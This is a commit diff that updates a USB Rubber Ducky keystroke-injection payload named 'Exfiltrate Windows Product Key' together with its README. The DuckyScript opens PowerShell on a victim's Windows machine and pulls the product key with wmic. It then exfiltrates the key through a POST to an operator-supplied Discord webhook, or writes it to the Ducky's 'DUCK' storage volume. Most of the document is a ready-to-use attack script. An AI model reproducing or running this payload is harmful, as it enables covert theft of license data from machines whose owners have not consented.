USB Rubber Ducky Storage

The method of data storage via USB Rubber Ducky storage has been added.
pull/400/head
Aleff 2024-01-04 16:31:43 +01:00
parent 0bd6624877
commit e595d71ac3
2 changed files with 42 additions and 23 deletions

View File

@ -57,13 +57,17 @@ The following commands are then executed to obtain the necessary information abo
The acquired information is stored in the `$exfiltration` variable, which is subsequently used to create the `$payload` object. This object is then utilized for exfiltration via a Discord Webhook.
**Exfiltration**:
**Exfiltration via Discord Webhook**:
The `$hookUrl` variable was initialized at the beginning of the payload with the value you need to define before execution.
```powershell
Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
```
The `$hookUrl` variable was initialized at the beginning of the payload with the value you need to define before execution.
**Exfiltration via USB Rubber Ducky Storage**:
If you use the exfiltration method set up to retain data using Rubber Ducky's USB storage, you will not have to make any changes.
## Product Key Types

View File

@ -1,17 +1,25 @@
REM ###################################################
REM # |
REM # Title : Exfiltrate Windows Product Key |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################
REM_BLOCK
###################################################
# |
# Title : Exfiltrate Windows Product Key |
# Author : Aleff |
# Version : 1.0 |
# Category : Exfiltration |
# Target : Windows 10-11 |
# |
###################################################
END_REM
REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg...
DEFINE #DISCORD-WEBHOOK example.com
REM_BLOCK
How would you prefer to do the exfiltration?
Via Discord Webhooks or via Rubber Ducky USB storage?
If you prefer to use the storage offered by USB Rubber Ducky, set the boolean variable #USB-RUBBER-DUCKY-STORAGE to TRUE, otherwise set it to FALSE and the alternative mode will be automatically selected, so via Discord Webhook.
END_REM
DEFINE #USB-RUBBER-DUCKY-STORAGE TRUE
EXTENSION DETECT_READY
REM VERSION 1.1
@ -47,14 +55,21 @@ STRING powershell
ENTER
DELAY 2000
STRINGLN
$hookUrl = "#DISCORD-WEBHOOK"
$exfiltration = @"
$(wmic path softwarelicensingservice get OA3xOriginalProductKey)
$(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription)
"@
$payload = [PSCustomObject]@{
content = $exfiltration
}
Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
END_STRINGLN
STRINGLN $key_detected=$(wmic path softwarelicensingservice get OA3xOriginalProductKey)+$(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription);
IF_DEFINED_TRUE #USB-RUBBER-DUCKY-STORAGE
STRINGLN
$m=(Get-Volume -FileSystemLabel 'DUCK').DriveLetter;
echo $key_detected >> ${m}:\exfiltration.txt
END_STRINGLN
END_IF_DEFINED
IF_NOT_DEFINED_TRUE #USB-RUBBER-DUCKY-STORAGE
STRINGLN
$hookUrl = "#DISCORD-WEBHOOK"
$exfiltration = @"$key_detected"@
$payload = [PSCustomObject]@{
content = $exfiltration
}
Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
END_STRINGLN
END_IF_DEFINED